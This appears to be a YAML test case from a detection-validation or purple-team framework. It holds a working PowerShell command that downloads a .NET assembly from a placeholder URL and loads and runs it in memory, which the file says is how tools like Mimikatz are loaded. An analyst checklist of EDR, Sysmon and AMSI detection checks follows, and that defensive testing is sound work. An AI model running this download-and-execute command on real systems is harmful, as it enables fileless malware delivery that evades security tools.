id: DLEXEC_003_powershell_reflective_assembly
name: "Download and Execute — PowerShell Reflective Assembly Load (Fileless)"
mitre: "T1059.001, T1620, T1105"
category: download_execute
description: >
  Downloads a .NET assembly (DLL or EXE) directly into memory using DownloadData
  and loads it via System.Reflection.Assembly.Load without writing to disk.
  This is the technique used to load tools like Rubeus, SharpHound, and Mimikatz
  entirely in memory. Replace PLACEHOLDER_URL and adjust class/method names to match
  your hosted assembly.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-003] PowerShell reflective in-memory assembly load"

  - type: exec_powershell
    encoded: false
    command: |
      $data = (New-Object System.Net.WebClient).DownloadData('PLACEHOLDER_URL')
      $assem = [System.Reflection.Assembly]::Load($data)
      $class = $assem.GetType("PLACEHOLDER_NAMESPACE.PLACEHOLDER_CLASS")
      $method = $class.GetMethod("PLACEHOLDER_METHOD")
      $method.Invoke(0, $null)
    timeout_seconds: 30

  - type: sleep
    seconds: 30

analyst_checklist:
  - "EDR: Alert on System.Reflection.Assembly.Load with in-memory data (no file path)?"
  - "EDR: DownloadData from powershell.exe captured with destination URL?"
  - "Sysmon Event ID 3: Network connection from powershell.exe logged?"
  - "Sysmon Event ID 7: DLL/module loaded into powershell.exe from memory (no disk path)?"
  - "Windows Event ID 4104: Script block log captured the Assembly.Load call?"
  - "AMSI: Did AMSI scan the in-memory assembly before execution?"
  - "EDR: No file artifact on disk — does EDR still alert on the behavior?"
  - "SIEM: In-memory load events present without corresponding file create event?"
  - "Rule opportunity (critical): PowerShell script block containing 'Assembly.Load' + 'DownloadData'"
  - "Rule opportunity: Sysmon Event 7 where module has no disk path (loaded from memory)"
  - "Gap check: If no alert fired — EDR relies on file scanning and misses fileless techniques."
